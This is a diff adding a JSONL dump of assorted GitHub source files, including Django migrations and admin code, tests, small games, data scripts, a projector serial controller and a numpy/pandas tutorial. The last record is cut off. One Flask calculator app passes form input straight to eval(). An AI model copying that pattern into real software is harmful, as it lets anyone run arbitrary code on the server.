diff --git "a/796.jsonl" "b/796.jsonl" new file mode 100644--- /dev/null +++ "b/796.jsonl" @@ -0,0 +1,150 @@ +{"seq_id":"30202742959","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lite', '0030_auto_20180423_1121'),\n ('ppt', '0003_auto_20180423_1128'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='pptteam',\n options={'ordering': ['-serial'], 'verbose_name': '\\u56e2\\u961f', 'verbose_name_plural': '\\u56e2\\u961f'},\n ),\n migrations.AlterModelOptions(\n name='pptteamuser',\n options={'ordering': ['-serial'], 'verbose_name': '\\u6210\\u5458', 'verbose_name_plural': '\\u6210\\u5458'},\n ),\n migrations.AddField(\n model_name='pptfile',\n name='upload_user',\n field=models.ForeignKey(related_name='upload_user', verbose_name='\\u4e0a\\u4f20\\u8005', blank=True, to='lite.User', null=True),\n ),\n ]\n","repo_name":"bushitan/live_server","sub_path":"ppt/migrations/0004_auto_20180423_1225.py","file_name":"0004_auto_20180423_1225.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18560178125","text":"import urllib2\nfrom haversine import haversine\nimport json\nimport re\n\nWORDS = [\"EVENTS\", \"ROAD\"]\n\n\ndef getPromet(lat, lon):\n # -------------------------------------------------------\n # DOBI lokacijo v obliki lat pa lon\n # VRNE bližnje dogodke kot array da jasper direkt pove\n # Link do navodil https://github.com/zejn/arsoapi\n # ---------------------------------------------------------*/\n promet = []\n range = 20 #km\n currentLocation = (lat, lon)\n link = \"http://janliber.spletniki.si/\"\n webPage = urllib2.urlopen(link)\n content = webPage.read()\n\n\n events = json.loads(content.decode(\"utf-8\"))\n for event in events:\n eventLocation = (event['lat'], event['lon'])\n distance = haversine(currentLocation, eventLocation)\n if(distance < range):\n promet.append(event[\"description\"])\n\n\n return promet\n\n\ndef handle(text, mic):\n \"\"\"\n Responds to user-input, typically speech text, by telling the events on the road.\n Arguments:\n text -- user-input, typically transcribed speech\n mic -- used to interact with the user (for both input and output)\n \"\"\"\n\n lat=46.4221890\n lon=14.9262910\n events = getPromet(lat, lon)\n\n for event in events:\n mic.say(event)\n\n\ndef isValid(text):\n \"\"\"\n Returns True if the input is related to events.\n Arguments:\n text -- user-input, typically transcribed speech\n \"\"\"\n return bool(re.search(r'\\bevents on the road\\b', text, re.IGNORECASE))\n","repo_name":"xuhui/CarDataReader","sub_path":"Events.py","file_name":"Events.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70948752800","text":"# django\n\nfrom base.tests import BaseApiTestCase\n\n\nclass ListingReviewCrudTestCase(BaseApiTestCase):\n def setUp(self):\n super().setUp()\n self.listing = self.create_listing().json()\n self.review = self.create_listing_review(\n {\"listing\": self.listing.get(\"id\")}\n ).json()\n\n def test_listing_review_create(self):\n data = {\n \"reviewer\": self.user.get(\"id\"),\n \"listing\": self.listing.get(\"id\"),\n \"score\": 3,\n \"description\": \"test\",\n }\n response = self.create_listing_review(data)\n response_data = response.json()\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response_data.get(\"reviewer\"), self.user.get(\"id\"))\n self.assertEqual(response_data.get(\"listing\"), self.listing.get(\"id\"))\n self.assertEqual(response_data.get(\"score\"), 3)\n self.assertEqual(response_data.get(\"description\"), \"test\")\n\n def test_listing_review_update(self):\n response = self.client.put(\n f\"/api/reviews/{self.review.get('id')}/\",\n {\n \"reviewer\": self.user.get(\"id\"),\n \"listing\": self.listing.get(\"id\"),\n \"score\": 1,\n \"description\": \"abc\",\n },\n )\n data = response.json()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(data.get(\"reviewer\"), self.user.get(\"id\"))\n self.assertEqual(data.get(\"listing\"), self.listing.get(\"id\"))\n self.assertEqual(data.get(\"score\"), 1)\n self.assertEqual(data.get(\"description\"), \"abc\")\n\n def test_listing_review_detail(self):\n response = self.client.get(f\"/api/reviews/{self.review.get('id')}/\")\n data = response.json()\n self.assertIsNotNone(data.get(\"reviewer\"))\n self.assertIsNotNone(data.get(\"listing\"))\n self.assertIsNotNone(data.get(\"score\"))\n self.assertIsNotNone(data.get(\"description\"))\n\n def test_listing_review_delete(self):\n response = self.client.delete(f\"/api/reviews/{self.review.get('id')}/\")\n self.assertEqual(response.status_code, 204)\n\n def test_listing_review_list(self):\n for _ in range(10):\n self.create_listing_review()\n\n response = self.client.get(\"/api/reviews/\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json()), 11)\n","repo_name":"KnowYourselves/rentool-backend","sub_path":"listings/tests/test_listing_review_crud.py","file_name":"test_listing_review_crud.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30189567219","text":"from board import Board, drawBoard, swapColour\r\nfrom ai import AI\r\n\r\ndef getUserInput(board):\r\n column = int(input(\"Choose slot: \")) - 1\r\n while not (0 <= column < Board.BOARDWIDTH) or board._boardFreeSlots[column] == Board.BOARDHEIGHT:\r\n print(\"Please choose a valid slot.\")\r\n column = int(input(\"Choose slot: \")) - 1\r\n print()\r\n return column\r\n\r\ndef gameLoop():\r\n\r\n playerColour = \"O\"\r\n aiColour = \"X\"\r\n currentColour = playerColour\r\n\r\n board = Board()\r\n ai = AI(aiColour, playerColour, board)\r\n win = False\r\n\r\n while not win:\r\n drawBoard(board)\r\n\r\n if currentColour == playerColour:\r\n print(\"Your turn!\")\r\n userInput = getUserInput(board)\r\n tokenPosition = board.drop(userInput, currentColour)\r\n elif currentColour == aiColour:\r\n print(\"AI is thinking!\")\r\n tokenPosition = ai.makeMove()\r\n\r\n if board.checkWinLocal(*tokenPosition, currentColour):\r\n win = True\r\n if currentColour == playerColour:\r\n print(\"----- You Win! -----\")\r\n elif currentColour == aiColour:\r\n print(\"----- AI Wins! -----\")\r\n drawBoard(board)\r\n\r\n ai.updateInternalBoard()\r\n currentColour = swapColour(currentColour)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n gameLoop()\r\n","repo_name":"benmandrew/Connect4AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41762746232","text":"import sys\nimport textwrap\nimport logging\n\nif __name__ == \"__main__\":\n sys.path.insert(0, \".\")\n\nfrom neubot import utils_modules\n\nMODULES = {\n \"CA\" : \"neubot.net.CA\",\n \"agent\" : \"neubot.agent\",\n \"api.client\" : \"neubot.api.client\",\n \"database\" : \"neubot.database.main\",\n \"bittorrent\" : \"neubot.bittorrent\",\n \"http.client\" : \"neubot.http.client\",\n \"http.server\" : \"neubot.http.server\",\n 'notifier' : 'neubot.notifier',\n \"privacy\" : \"neubot.privacy\",\n \"raw\" : \"neubot.raw\",\n \"server\" : \"neubot.server\",\n \"speedtest\" : \"neubot.speedtest.client\",\n \"speedtest.client\" : \"neubot.speedtest.client\",\n \"speedtest.server\" : \"neubot.speedtest.server\",\n \"stream\" : \"neubot.net.stream\",\n}\n\n#\n# XXX Good morning, this is an hack: py2exe does not\n# load modules that are not referenced and we're very\n# lazy in this file. As a workaround let's load all\n# modules when we're in windows and we are not frozen\n# so we should reference all modules when py2exe is\n# inspecting us.\n#\nif sys.platform == 'win32' and not hasattr(sys, 'frozen'):\n #import neubot.net.CA # posix only\n import neubot.agent\n import neubot.api.client\n import neubot.database.main\n import neubot.bittorrent\n import neubot.http.client\n import neubot.http.server\n import neubot.privacy\n #import neubot.server # requires PyGeoIP\n import neubot.speedtest.client\n import neubot.speedtest.client\n import neubot.speedtest.server\n import neubot.net.stream\n\ndef run(argv):\n\n # /usr/bin/neubot module ...\n del argv[0]\n module = argv[0]\n\n if module == \"help\":\n sys.stdout.write(\"Neubot help -- prints available commands\\n\")\n\n commands = \" \".join(sorted(MODULES.keys()))\n lines = textwrap.wrap(commands, 60)\n sys.stdout.write(\"Commands: \" + lines[0] + \"\\n\")\n for s in lines[1:]:\n sys.stdout.write(\" \" + s + \"\\n\")\n\n sys.stdout.write(\"Try `neubot CMD --help` for more help on CMD.\\n\")\n sys.exit(0)\n\n utils_modules.modprobe(None, \"load_subcommand\", MODULES)\n\n if not module in MODULES:\n sys.stderr.write(\"Invalid module: %s\\n\" % module)\n sys.stderr.write(\"Try `neubot help` to list the available modules\\n\")\n sys.exit(1)\n\n # Dinamically load the selected module's main() at runtime\n module = MODULES[module]\n __import__(module)\n MAIN = sys.modules[module].main\n\n # neubot module ...\n argv[0] = \"neubot \" + argv[0]\n\n try:\n MAIN(argv)\n except KeyboardInterrupt:\n pass\n except SystemExit:\n raise\n except:\n logging.error('Exception', exc_info=1)\n sys.exit(1)\n sys.exit(0)\n\nif __name__ == \"__main__\":\n run(sys.argv)\n","repo_name":"neubot/neubot","sub_path":"neubot/main/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"51"} +{"seq_id":"42487757765","text":"import pytesseract \nfrom pytesseract import Output\nimport cv2 \nimport common\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport main.helper as helper\nimport config\nimport pathlib\nimport find_corners as find_corners\n\n#img = cv2.imread('coffee_sample.png')\n\n\n# pic = 'hello.jpeg'\n# img = cv2.imread(pic)\nfiles = [f for f in pathlib.Path(\"will_customs\").iterdir()]\niter = 1\nfor file in files:\n #config.img = cv2.imread(str(file))\n img = cv2.imread(str(file))\n img = cv2.resize(img, (900, 900), cv2.INTER_AREA)\n config.img = img\n\n full_height,full_width,_ = img.shape\n \n #img = cv2.resize(img, (1200, 1200))\n # imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n hImg, wImg, _ = img.shape\n\n ave_value = (np.max(img) + np.min(img))/2\n\n contrast = (img > ave_value) * 255\n\n contrast = contrast.astype(\"uint8\")\n\n #plt.savefig('output2.png')\n custom_config = '--psm 1 --oem 3 -c tessedit_char_blacklist=0123456789'\n full_width = 0\n full_height = 0\n print(str(full_width) + \", \", str(full_height))\n x_top = 0\n x_bot = 0\n y_top = 0\n y_bot = 0\n\n img_string = 'image'\n pts = np.zeros((4, 2), dtype = \"float32\")\n\n pts = find_corners.find_corners(img)\n img_wrect = img.copy()\n img_wrect = helper.draw_rect(img, pts)\n\n\n cv2.imshow(img_string, img_wrect)\n\n helper.drag_corners(img, img_wrect, img_string, pts)\n\n #helper.click_corners(img, img_string, full_width, full_height) ### CORNERS\n \n while (True):\n k = cv2.waitKey(10)\n if k == 32:\n break\n\n print(\"Rect Done [X]\")\n\n \n #pts = np.asarray(config.global_coord, dtype = \"float32\")\n warped = helper.four_point_transform(img, pts) # Their code\n\n warp_h, warp_w, _ = warped.shape\n\n # cv2.imshow(\"warp\", warped)\n # print(\"warp dimensions: \", warped.shape)\n # print(\"(B)\")\n # print(\"[Press [space] to continue]\")\n\n # while (True):\n # k = cv2.waitKey(10)\n # if k == 32:\n # break\n\n print(\"Loading letter recognition...\")\n\n wi = math.ceil(warp_w/15)\n hi = math.ceil(warp_h/15)\n print(str(wi) + \", \", str(hi))\n\n charar = np.chararray((15, 15))\n print(\"warp dimensions: \", warped.shape)\n cp_warped = warped.copy()\n max_dim = max(wi, hi)\n cp_warped = cv2.resize(cp_warped, (max_dim*15, max_dim*15))\n cv2.imshow(\"warp\", cp_warped)\n print(\"warp dimensions: \", cp_warped.shape)\n print(\"(B)\")\n print(\"[Press [space] to continue]\")\n\n while (True):\n k = cv2.waitKey(10)\n if k == 32:\n cv2.destroyWindow(\"warp\")\n break\n\n cv2.imwrite(\"./error_warp/w\" + str(iter) + \".jpg\", cp_warped)\n config.click_incr = 0\n config.abs_incr = 0\n config.done = False\n iter = iter + 1\n #common.save_img(cp_warped, 'warped.jpg')\n","repo_name":"kwwangkw/scrabble-solver","sub_path":"Training_Data/warp_lots.py","file_name":"warp_lots.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13406396371","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools\n\n\nclass Goal(models.Model):\n _name = 'secret.secret'\n _description = 'Secrets'\n\n name = fields.Char(\n string=\"Nom court\",\n compute=\"_name_short\")\n secret = fields.Text(\n string=\"Secret\"\n )\n ipaddress = fields.Char(\n string=\"Adresse ip\"\n )\n\n\n @api.depends('secret')\n def _name_short(self):\n for record in self:\n if record.secret:\n record.name = record.secret[:50] + '...'\n else:\n record.name = False","repo_name":"yterrettaz/secret","sub_path":"local-src/secret/models/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14319323192","text":"from flask import Flask, render_template, request\r\nimport os\r\n\r\napp = Flask(__name__)\r\n\r\ntemplate_dir = os.path.abspath('templates')\r\napp.template_folder = template_dir\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('index.html')\r\n\r\n@app.route('/calculate', methods=['POST'])\r\ndef calculate():\r\n expression = request.form['expression']\r\n result = eval(expression)+1\r\n return str(result)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"tydantang/RO_Calculator","sub_path":"Test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14578660635","text":"import pandas as pd\nfrom functools import reduce\n\"\"\"\n\tThis file aggregates the provincial dfs web scraped from provincial_data_web_importer.\n\tIt then finds the total populations for the main geographical areas of canada for each year that \n\tis common among all provincial data.\n\"\"\"\n#import the data\ndf_list = []\ndef df_creator(province):\n csv_name = r'../data/'+'population_by_year_df_'+province+'.csv'\n df = pd.read_csv(csv_name)\n df_list.append(df)\n return df\n\ndf_Alberta = df_creator('AB')\ndf_British_Columbia = df_creator('BC')\ndf_Manitoba = df_creator('MB')\ndf_New_Brunswick = df_creator('NB')\ndf_Newfoundland_and_Labrador = df_creator('NL')\ndf_Northwest_Territories = df_creator('NT')\ndf_Nova_Scotia = df_creator('NS')\ndf_Nunavut = df_creator('NU')\ndf_Ontario = df_creator('ON')\ndf_Prince_Edward_Island = df_creator('PE')\ndf_Quebec = df_creator('QC')\ndf_Saskatchewan = df_creator('SK')\ndf_Yukon = df_creator('YT')\n\n\n# =============================================================================\n# Join the data on common years\n# =============================================================================\nyear_list=[df['year'] for df in df_list]\ncommon_years = sorted(list(set(year_list[0]).intersection(*year_list)))\ndf_list = [df[df['year'].isin(common_years)] for df in df_list]\ncommon_years_df = reduce(lambda left,right: pd.merge(left,right,on='year'), df_list)\n\n#add total populations for each geography group\ndef total_population(df):\n df['canada'] = df.iloc[:, 1:13].sum(axis=1)\n df['maritimes'] = df[['NB','NS','PE']].sum(axis=1)\n df['western_canada'] = df[['BC','AB','SK','MB']].sum(axis=1)\n df['eastern_canada'] = df[['NB','NL','NS','ON','PE','QC']].sum(axis=1)\n df['prairies'] = df[['MB','SK','AB']].sum(axis=1)\n return df\ncommon_years_df = total_population(common_years_df )\n\ncommon_years_df.to_csv(r'../data/provinces_common_years_population.csv', index = False)\n\n\n\n\n\n\n\n\n","repo_name":"marcosmcz/math6627_coursework","sub_path":"project3/data_cleaning/province_df_agregator.py","file_name":"province_df_agregator.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34679475812","text":"from maggma.builders.map_builder import MapBuilder\nfrom maggma.stores import MongoStore\nfrom typing import Tuple\nfrom emmet.core.mobility.migrationgraph import MigrationGraphDoc\nfrom emmet.builders.utils import get_hop_cutoff\nfrom pymatgen.apps.battery.insertion_battery import InsertionElectrode\nfrom pymatgen.analysis.diffusion.neb.full_path_mapper import MigrationGraph\nfrom emmet.core.utils import jsanitize\n\n\nclass MigrationGraphBuilder(MapBuilder):\n def __init__(\n self,\n insertion_electrode: MongoStore,\n migration_graph: MongoStore,\n algorithm: str = \"hops_based\",\n min_hop_distance: float = 1,\n max_hop_distance: float = 7,\n populate_sc_fields: bool = True,\n min_length_sc: float = 8,\n minmax_num_atoms: Tuple[int, int] = (80, 120),\n ltol: float = 0.2,\n stol: float = 0.3,\n angle_tol: float = 5,\n **kwargs,\n ):\n self.insertion_electrode = insertion_electrode\n self.migration_graph = migration_graph\n self.algorithm = algorithm\n self.min_hop_distance = min_hop_distance\n self.max_hop_distance = max_hop_distance\n self.populate_sc_fields = populate_sc_fields\n self.min_length_sc = min_length_sc\n self.minmax_num_atoms = minmax_num_atoms\n self.ltol = ltol\n self.stol = stol\n self.angle_tol = angle_tol\n super().__init__(source=insertion_electrode, target=migration_graph, **kwargs)\n self.connect()\n\n def unary_function(self, item):\n warnings = []\n\n # get entries and info from insertion electrode\n ie = InsertionElectrode.from_dict(item[\"electrode_object\"])\n entries = ie.get_all_entries()\n wi_entry = ie.working_ion_entry\n\n # get migration graph structure\n structs = MigrationGraph.get_structure_from_entries(entries, wi_entry)\n if len(structs) == 0:\n warnings.append(\"cannot generate migration graph from entries\")\n d = None\n else:\n if len(structs) > 1:\n warnings.append(\n f\"migration graph ambiguous: {len(structs)} possible options\"\n )\n # get hop cutoff distance\n d = get_hop_cutoff(\n migration_graph_struct=structs[0],\n mobile_specie=wi_entry.composition.chemical_system,\n algorithm=self.algorithm,\n min_hop_distance=self.min_hop_distance,\n max_hop_distance=self.max_hop_distance,\n )\n\n # get migration graph doc\n try:\n mg_doc = MigrationGraphDoc.from_entries_and_distance(\n battery_id=item[\"battery_id\"],\n grouped_entries=entries,\n working_ion_entry=wi_entry,\n hop_cutoff=d,\n populate_sc_fields=self.populate_sc_fields,\n min_length_sc=self.min_length_sc,\n minmax_num_atoms=self.minmax_num_atoms,\n ltol=self.ltol,\n stol=self.stol,\n angle_tol=self.angle_tol,\n warnings=warnings,\n )\n except Exception as e:\n mg_doc = MigrationGraphDoc(\n battery_id=item[\"battery_id\"],\n entries_for_generation=entries,\n working_ion_entry=wi_entry,\n hop_cutoff=d,\n migration_graph=None,\n populate_sc_fields=self.populate_sc_fields,\n min_length_sc=self.min_length_sc,\n minmax_num_atoms=self.minmax_num_atoms,\n ltol=self.ltol,\n stol=self.stol,\n angle_tol=self.angle_tol,\n warnings=warnings,\n deprecated=True,\n )\n self.logger.error(f\"error getting MigrationGraphDoc: {e}\")\n return jsanitize(mg_doc)\n\n return jsanitize(mg_doc.model_dump())\n","repo_name":"materialsproject/emmet","sub_path":"emmet-builders/emmet/builders/mobility/migration_graph.py","file_name":"migration_graph.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"51"} +{"seq_id":"73913712479","text":"# -*- encoding: utf-8 -*-\nfrom typing import Any\n\n\ndef sequential_search(key: Any, array: list) -> int:\n for index, value in enumerate(array):\n if value == key:\n return index\n raise KeyError\n\n\nif __name__ == \"__main__\":\n array = [1, 5, 4, 3, 12, 14, 2, 7, 9]\n key = 13\n try:\n index = sequential_search(key, array)\n print(f\"Key({key}) index is {index}\")\n except KeyError:\n print(\"Not found\")\n","repo_name":"Codejune/algorithm","sub_path":"method/sequential-search/sequential_search.py","file_name":"sequential_search.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72700539359","text":"#!/usr/bin/env python\n\nimport sys\nimport curses\nfrom curses import wrapper\nimport serial # pip install pyserial\n\nkeylabels = {\n chr(curses.KEY_RIGHT): 'Right',\n chr(curses.KEY_LEFT): 'Left',\n chr(curses.KEY_UP): 'Up',\n chr(curses.KEY_DOWN): 'Down',\n '\\n': 'Enter'\n}\n\nkeys = {\n 'w': 'C00',\n 'q': 'C01',\n '1': 'C05',\n '2': 'C06',\n 's': 'C1C',\n 'a': 'C1D',\n chr(curses.KEY_RIGHT): 'C3A',\n chr(curses.KEY_LEFT): 'C3B',\n chr(curses.KEY_UP): 'C3C',\n chr(curses.KEY_DOWN): 'C3D',\n '\\n': 'C3F',\n 'x': 'x'\n}\n\ncommands = {\n 'C00': 'Power ON',\n 'C01': 'Power OFF',\n 'C05': 'Computer 1',\n 'C06': 'Computer 2',\n 'C1C': 'Menu ON',\n 'C1D': 'Menu OFF',\n 'C3A': 'Pointer right',\n 'C3B': 'Pointer left',\n 'C3C': 'Pointer up',\n 'C3D': 'Pointer down',\n 'C3F': 'Enter',\n 'x': 'Exit'\n}\n\ndef usage():\n key_descriptions = {chr(getattr(curses, x)): x[4:]\n for x in dir(curses) if x.startswith('KEY_')}\n ret = ''\n\n for known_key, command in keys.items():\n key_description = None\n if known_key in keylabels.keys():\n key_description = keylabels.get(known_key)\n if key_description is None:\n key_description = known_key if str(known_key).isalnum() else repr(known_key)\n cmd_description = commands.get(command)\n ret += f'{key_description}: {cmd_description}'\n if ret:\n ret += '\\n'\n return ret\n\ndef main(scr):\n char = '\\0'\n\n if len(sys.argv) != 2:\n print(\"usage: {} serialdevice\".format(sys.argv[0]))\n quit(1)\n\n try:\n s = serial.Serial(sys.argv[1], baudrate=19200)\n except serial.serialutil.SerialException as err:\n print(\"Error while trying to open device {}: {}\".format(sys.argv[1], err))\n quit(1)\n\n curses.noecho()\n\n while True:\n scr.clear()\n scr.addstr(0, 0, 'Last key: ' + str(ord(char)) +\n '\\n\\n' + usage())\n char = chr(scr.getch())\n if char == 'x':\n curses.endwin()\n quit(0)\n else:\n command = keys.get(char)\n if command:\n s.write(command.encode() + b'\\r\\n')\n\nif __name__ == \"__main__\":\n wrapper(main)\n","repo_name":"hakierspejs/projektor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32799701244","text":"import logging, sys, time, cv2, ffmpeg, numpy\n\nlogger = logging.getLogger(\"Writer\")\nlogger.setLevel(\"INFO\")\nformatter = logging.Formatter(\"%(asctime)s %(levelname)-8s %(module)s %(message)s\")\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nvideoCapture = cv2.VideoCapture('/home/servadmin/Downloads/motion-11-55-41.avi')\nprocess = (\n ffmpeg\n .input('pipe:', framerate='{}'.format(videoCapture.get(cv2.CAP_PROP_FPS)), format='rawvideo', pix_fmt='bgr24', s='{}x{}'.format(int(videoCapture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(videoCapture.get(cv2.CAP_PROP_FRAME_HEIGHT))))\n .output('output/out.mp4', vcodec='h264_v4l2m2m', pix_fmt='nv21', **{'b:v': 2000000})\n .overwrite_output()\n .run_async(pipe_stdin=True)\n)\nlastFrame = False\nframes = 0\nstart = time.time()\nwhile not lastFrame:\n ret, image = videoCapture.read()\n if ret:\n process.stdin.write(\n image\n .astype(numpy.uint8)\n .tobytes()\n ) \n frames += 1\n else:\n lastFrame = True\nelapsed = time.time() - start\nlogger.info(\"%d frames\" % frames)\nlogger.info(\"%4.1f FPS, elapsed time: %4.2f seconds\" % (frames / elapsed, elapsed))\ndel videoCapture\n\n","repo_name":"BhavyanshM/MapSense","sub_path":"Python/Scripts/log_h264_mp4.py","file_name":"log_h264_mp4.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43444687603","text":"### Numpy ###\n\n# define an array\nimport numpy\nmylist = [1, 2, 3]\nmyarray = numpy.array(mylist)\nprint(myarray)\nprint(myarray.shape)\n\n# access values\nimport numpy\nmylist = [[1, 2, 3], [3, 4, 5]]\nmyarray = numpy.array(mylist)\nprint(myarray)\nprint(myarray.shape)\nprint('First row: {}'.format(myarray[0]))\nprint('Last row: {}'.format(myarray[-1]))\nprint('Specific row and col: {}'.format(myarray[0, 2]))\nprint('Whole col: {}'.format(myarray[:, 2]))\n\n\n# arithmetic\nimport numpy\nmyarray1 = numpy.array([2, 2, 2])\nmyarray2 = numpy.array([3, 3, 3])\nprint('Addition: {}'.format(myarray1 + myarray2))\nprint('Multiplication: {}'.format(myarray1 * myarray2))\n\n\n### Matplotlib ###\n# basic line plot\nimport matplotlib.pyplot as plt\nimport numpy\nmyarray = numpy.array([1, 2, 3])\nplt.plot(myarray)\nplt.xlabel('some x axis')\nplt.ylabel('some y axis')\n#plt.show()\n\n# basic scatter plot\nimport matplotlib.pyplot as plt\nimport numpy\nx = numpy.array([1, 2, 3])\ny = numpy.array([2, 4, 6])\nplt.scatter(x,y)\nplt.xlabel('some x axis')\nplt.ylabel('some y axis')\n#plt.show()\n\n\n### Pandas ###\n# series\nimport numpy\nimport pandas\nmyarray = numpy.array([1, 2, 3])\nrownames = ['a', 'b', 'c']\nmyseries = pandas.Series(myarray, index=rownames)\nprint(myseries)\n\n# dataframe\nimport numpy\nimport pandas\nmyarray = numpy.array([[1, 2, 3], [4, 5, 6]])\nrownames = ['a', 'b']\ncolnames = ['one', 'two', 'three']\nmydataframe = pandas.DataFrame(myarray, index=rownames, columns=colnames)\nprint(mydataframe)\n\nprint(\"method 1:\")\nprint('one column: {}'.format(mydataframe['one']))\nprint(\"method 2:\")\nprint('one column: {}'.format(mydataframe.one))\n\n","repo_name":"phuongdps/machinelearning","sub_path":"examples/libraries.py","file_name":"libraries.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32490792399","text":"from django.contrib import admin\nfrom games.models import Category, Game\n# Register your models here.\n\nclass GameInline(admin.TabularInline):\n model = Game\n@admin.register(Category)\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('title', 'view_game_link', 'show_middle_price')\n inlines = [GameInline,]\n\n @admin.display(description='middle_price')\n def show_middle_price(self, obj): # выводит среднюю стоимость по каждой категории \n prices = 0\n print('first one')\n games = obj.game_set.all()\n \n for game in games:\n prices += game.price\n middle_price = prices/len(games) \n \n return f\"{middle_price: .2f} $\"\n\n\n @admin.display(description=\"games\")\n def view_game_link(self, obj):\n from django.utils.html import format_html\n from django.urls import reverse\n from django.utils.http import urlencode\n\n count = obj.game_set.count()\n url = (\n reverse('admin:games_game_changelist')\n + '?'\n + urlencode({'category_id': f'{obj.id}'})\n )\n return format_html('{} Games', url, count )\n\n@admin.register(Game)\nclass GameAdmin(admin.ModelAdmin):\n date_hierarchy = 'release_date_at'\n list_editable = ('release_date_at',)\n list_filter = ('category',)\n search_fields = ('category__title', 'title')\n readonly_fields = ('img_tag',)\n actions = ('make_inactive', 'export_as_json','export_as_csv')\n list_display = (\n 'title',\n 'release_date_at',\n 'show_pretty_price',\n 'img_preview',\n 'get_link',\n \n )\n\n @admin.display(description=\"custom price\")\n def show_pretty_price(self, obj):\n return f'$ {obj.price}'\n \n @admin.display(description=\"game image\")\n def img_preview(self, obj):\n from django.utils.html import mark_safe\n\n return mark_safe(\n f''\n )\n \n @admin.display(description=\"game image\")\n def img_tag(self, obj):\n from django.utils.html import mark_safe\n\n return mark_safe(\n f''\n )\n \n @admin.display(description='game link')\n def get_link(self, obj):\n from django.utils.html import mark_safe\n return mark_safe(\n f'Search'\n )\n \n @admin.action(description='перевести в неактивное состояние')\n def make_inactive(self, request, queryset):\n queryset.update(is_active=False)\n \n @admin.action(description=\"Скачать Json\")\n def export_as_json(self, request, queryset):\n from django.core import serializers\n from django.http import FileResponse\n import io\n from datetime import datetime\n response = FileResponse(\n io.BytesIO(serializers.serialize(\"json\", queryset).encode(\"utf-8\")),\n as_attachment=True,\n filename=f\"log-{datetime.now()}.json\",\n )\n return response\n \n @admin.action(description=\"Скачать CSV\")# скачать как csv \n def export_as_csv(self,request,queryset):\n import csv\n from django.http import HttpResponse\n meta = self.model._meta\n field_names = [field.name for field in meta.fields]\n\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)\n writer = csv.writer(response)\n\n writer.writerow(field_names)\n for obj in queryset:\n row = writer.writerow([getattr(obj, field) for field in field_names])\n \n return response","repo_name":"MikhailPrizba/tms_homework","sub_path":"homework25/game_shop/games/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9535758104","text":"import pygame\n\nclass Fenetre:\n def __init__(self,taille=[800,800]):\n \"\"\"Crée une fenêtre et ses caractérisque\n \"\"\"\n pygame.init()\n self.taille=taille\n self.nom=\"Othello\"\n self.ecran = pygame.display.set_mode(self.taille)\n self.icon = pygame.image.load(\"icon.png\")\n pygame.display.set_icon(self.icon)\n pygame.display.set_caption(self.nom)\n self.ouverte=True\n\n def verifier(self):\n \"\"\"Verifie si la fenetre est ouverte.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.ouverte=False\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.ouverte=False\n","repo_name":"MarcPartensky/Python-Games","sub_path":"Othello/Groupe/fenetre.py","file_name":"fenetre.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2713086891","text":"\nimport pandas as pd\n\n# pipenv install dash\n\n\ndf = 